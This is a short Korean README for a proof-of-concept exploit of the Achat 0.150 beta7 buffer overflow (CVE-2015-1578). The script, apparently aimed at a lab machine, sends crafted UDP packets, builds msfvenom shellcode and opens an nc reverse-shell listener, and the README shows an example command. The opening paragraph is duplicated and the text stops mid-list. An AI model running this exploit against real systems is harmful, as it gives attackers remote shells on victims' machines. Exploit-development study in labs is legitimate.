
이것은 Windows의 Achat 0.150 beta7에 존재하는 버퍼 오버플로우 취약점인 CVE-2015-1578에 대한 개념 증명 익스플로잇입니다. 익스플로잇을 통해 조작된 UDP 패킷을 전송하여 원격 코드 실행이 가능합니다.
이것은 Windows에서 Achat 0.150 beta7의 버퍼 오버플로우 취약점인 CVE-2015-1578에 대한 개념 증명 익스플로잇입니다. 익스플로잇을 통해 조작된 UDP 패킷을 이용한 원격 코드 실행이 가능합니다.
이 PoC는 깔끔하고 최소화된 잘 구조화된 익스플로잇 개발 예제로 사용되기 위해 만들어졌습니다. 다음을 보여줍니다:
msfvenom을 통한 동적 셸코드 생성msfvenom (Metasploit Framework의 일부)rlwrap (향상된 Netcat 사용성을 위한)msfvenom을 사용하여 유니코드 인코딩된 페이로드를 동적으로 생성합니다rlwrap nc를 사용하여 자동으로 리스너를 시작합니다-i <target_ip> 대상 IP 주소 (필수)
-l, --lhost <listener_ip> 리버스 셸을 위한 로컬 호스트 IP (필수)
-p, --lport <port> 리버스 셸을 위한 로컬 포트 (필수)
--rport <port> 대상의 원격 UDP 포트 (기본값: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
이것은 다음을 수행합니다: